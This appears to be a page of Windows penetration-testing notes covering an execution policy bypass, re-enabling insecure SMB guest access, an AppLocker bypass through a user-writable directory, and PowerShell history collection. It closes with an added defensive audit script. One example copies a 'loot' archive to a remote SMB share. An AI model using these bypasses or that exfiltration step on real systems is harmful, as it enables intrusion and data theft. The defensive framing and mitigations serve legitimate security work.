Windows

PowerShell's execution policy

PowerShell's execution policy is a safety feature that controls the conditions under which PowerShell loads configuration files and runs scripts. This feature helps prevent the execution of malicious scripts.

Start a PowerShell session with the execution policy bypassed (the policy is not a security boundary; this is a per-process override and is logged like any other process start):

C:\> powershell -ep bypass

Registry

Edit key

The following error appears when copying to an SMB share that only accepts unauthenticated (guest) access. To get past it, set AllowInsecureGuestAuth, located in HKLM\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters, to 1. Note that this re-enables insecure guest logons to SMB shares machine-wide, which is exactly what the policy exists to block.

PS C:\Users\Administrator> copy .\20220219102531_loot.zip \\10.9.52.138\tmpshare\loot.zip
copy : You can't access this shared folder because your organization's security policies block unauthenticated guest access. These
policies help protect your PC from unsafe or malicious devices on the network.
At line:1 char:1
+ copy .\20220219102531_loot.zip \\10.9.52.138\tmpshare\loot.zip
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Copy-Item], IOException
    + FullyQualifiedErrorId : System.IO.IOException,Microsoft.PowerShell.Commands.CopyItemCommand

You can do it with PowerShell:

PS C:\Users\Administrator> Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters' -Name 'AllowInsecureGuestAuth' -Value 1

Bypass AppLocker

If AppLocker is configured with only the default rules, we can bypass it by placing our executable in the following directory: C:\Windows\System32\spool\drivers\color (whitelisted by default). The default rules allow everything under C:\Windows, and this subdirectory is writable by standard users, so a binary dropped there matches the allow rule. Mitigation: add deny rules or exceptions for user-writable directories under %WINDIR% rather than relying on the defaults.

PowerShell history

  • ConsoleHost_history : %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt (PSReadline's persistent command history, one command per line, kept across sessions; worth collecting per user during an investigation)
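A defender-side audit of the items on this page, added here as an example (it is not part of the original notes): it reports the execution policies, the current AllowInsecureGuestAuth value, whether the AppLocker-whitelisted colour directory is writable by low-privilege groups, and where per-user ConsoleHost_history.txt files live. It assumes it is run elevated on the host being checked; the group list and the single directory are assumptions and can be extended.

```powershell
# Added audit script (not from the original page). Assumptions: run as an
# administrator; $LowPrivGroups and $CheckDirs are starting points, extend them.
$LanmanKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters'
$CheckDirs = @('C:\Windows\System32\spool\drivers\color')
$LowPrivGroups = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
                   'Everyone', 'NT AUTHORITY\INTERACTIVE')

function Get-GuestAuthSetting {
    # Returns the registry value, or a note when it was never set (default = blocked).
    $p = Get-ItemProperty -Path $LanmanKey -Name 'AllowInsecureGuestAuth' -ErrorAction SilentlyContinue
    if ($null -eq $p) { return 'not set (guest auth blocked by default)' }
    return $p.AllowInsecureGuestAuth
}

function Test-UserWritable {
    # True when any Allow ACE for a low-privilege group carries a write-type right.
    param([string]$Path)
    $writeMask = [System.Security.AccessControl.FileSystemRights]::CreateFiles -bor
                 [System.Security.AccessControl.FileSystemRights]::Write -bor
                 [System.Security.AccessControl.FileSystemRights]::Modify -bor
                 [System.Security.AccessControl.FileSystemRights]::FullControl
    foreach ($ace in (Get-Acl -Path $Path).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPrivGroups -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band [int]$writeMask) -ne 0) { return $true }
    }
    return $false
}

function Get-ConsoleHistoryFiles {
    # One PSReadline history file per user profile, if present.
    Get-ChildItem 'C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt' `
        -ErrorAction SilentlyContinue | Select-Object FullName, Length, LastWriteTime
}

# Report
Write-Output '== Execution policy (per scope) =='
Get-ExecutionPolicy -List
Write-Output "`n== AllowInsecureGuestAuth =="
Get-GuestAuthSetting
Write-Output "`n== AppLocker-allowed directories writable by low-privilege groups =="
foreach ($d in $CheckDirs) {
    [pscustomobject]@{ Path = $d; UserWritable = (Test-UserWritable -Path $d) }
}
Write-Output "`n== PSReadline history files =="
Get-ConsoleHistoryFiles
```

Run it before and after a hardening change to confirm the guest-auth value was reverted and that user-writable paths under C:\Windows are covered by an AppLocker exception.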